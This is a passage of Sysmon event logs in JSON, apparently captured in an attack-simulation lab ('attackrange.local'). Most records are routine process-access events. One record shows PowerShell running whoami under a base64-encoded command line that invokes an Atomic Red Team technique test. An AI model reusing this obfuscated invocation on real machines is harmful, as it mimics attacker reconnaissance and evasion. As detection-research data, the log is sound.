06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001037C10800}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001037C10800}","TargetProcessId":"932","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.778\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-001058C20800}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.778","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001058C20800}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001058C20800}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001058C20800}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
